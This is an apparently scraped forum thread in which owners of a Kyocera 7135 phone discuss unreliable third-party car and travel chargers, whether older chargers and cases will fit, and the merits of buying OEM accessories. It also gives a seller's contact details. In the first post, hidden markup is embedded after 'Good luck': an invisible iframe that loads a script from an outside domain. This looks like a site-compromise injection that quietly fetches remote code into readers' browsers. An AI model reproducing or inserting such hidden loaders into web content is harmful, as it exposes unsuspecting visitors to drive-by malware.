+ Reply to Thread
    DRC

Incompatible Accessories

I ordered a car charger and travel charger from
    accessory-wiz online (before I knew of Dan's)

The car charger phone connector only makes
    intermittent contact with the phone, beeping
    repeatedly as it comes on-line and off.

The travel charger causes the docking station
    to light up the "incorrect charger" signal.

While these were cheap, they are going back.

accessory-wiz also is very slow to respond to
    queries about orders. Had to complain to
    Yahoo (their back end) before they replied.

Good luck<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    DRC

Be wary of non-Kyo accessories, especially for such an expensive phone! Use at your own risk.

Accessories

I lost my 2235 before I got my 7135. What I want to know is can I use my old car charger and travel charger with my new 7135. I bought a new car charger because I was told they weren't compatible. But on the box I got with my new charger it works with a lot of phones. The plugs look the same but I worried about damaging my phone.

Also does anyone know if the black case that Kyocera is selling will work with the holster that comes with the phone. I would love to protect the outside of this phone with something. I thought I saw a picture of the black case and it looks like it has a belt clip on it. I like the sturdiness of the holster. It doesn't feel like it's going to slip out. Does anyone have any info on the black case?

Thanks!!

Loving my new 7135!!!!

I don't think you can use the case with the holster....

I, also, was sucked into accessory-wiz.com and bought a travel charger & car charger. I just received them YESTERDAY, although I ordered them on 4/11. (after calling numerous times, getting a phone machine, when they Do answer the phone, they just answer "hello", no store name...)

I guess you get what you pay for -- the quality is amazingly cheezy!

My question is, although they both seem to work, can they ruin my phone?

Administrator
    when it comes to powered accessories such as batteries and power chargers for example, i only get OEM stuff. the 'other' accessories maybe attractive price-wise, but in the end you want to make sure you keep your very expensive device happy. some of these chargers may not have the circuitry to trickle charge the battery and could shorten the batteries life if it keep sending the full charge...

save your money on getting a cheaper case instead...

I believe in buying OEM accessories within reason. What bothers me is that all my 6035 accessories do not work, so my car cord and extra chargers are junk.
    Route 6035 - 7135 - XV6600woc - Q

Originally posted by KLiuLess
    Be wary of non-Kyo accessories, especially for such an expensive phone! Use at your own risk.
    I say just don't risk it at all! (well, for anything involving powering the phone). The 7135 is the Ferrari of phones... it deserves to be treated better
    Please visit my picture site: Robert-O-Rama :)

OEM only way to go . . .

With Dan selling OEM stuff so cheap you have to be crazy to buy from another source. The last time I ordered an accessory for my wifes Star Tac from some store off Ebay I couldn't believe what a piece of junk it was. I bought a cradle/charger not even thinking that it would not made by Motorola.
    This thing was so cheap it looked like it came out of a McDonald's happy meal box! The plastic adapter's cord was made of such cheap plastic it would not even roll up to store it away without springing open again.

cjc
    How do you reach "Dan"? Does he have a store or website? Please post his contact info.

Originally posted by cjc
    How do you reach "Dan"? Does he have a store or website? Please post his contact info.
    Daniel Horton
    Customer Service 203-629-1360
    336-558-6289
    Email:danscellphones@aol.com
    dans_cellular_accessories(ebay user name)

Check out the "classifieds" forum if you want some more background and info.

Re: Accessories

Originally posted by Artkazi
    I lost my 2235 before I got my 7135. What I want to know is can I use my old car charger and travel charger with my new 7135. I bought a new car charger because I was told they weren't compatible. But on the box I got with my new charger it works with a lot of phones. The plugs look the same but I worried about damaging my phone.
    Do a search on "2235 charger" (showing results as posts) and you'll see that question addressed a few times. The new chargers for the 7135 do appear to work with the 2235 but I am not certain that the old chargers are safe for the 7135 since I received a note from Kyocera stating that they are not. They may just have stated that to get me to purchase a new one, I don't know. However, if the old charger ruins my phone, they can claim that I knew better.

You can always asks questions here but no one here is guaranteeing your phone.

Re: Re: Accessories

Originally posted by Beryl
    You can always asks questions here but no one here is guaranteeing your phone.
    Are you serious?? I thought that was one of the privileges of membership! :p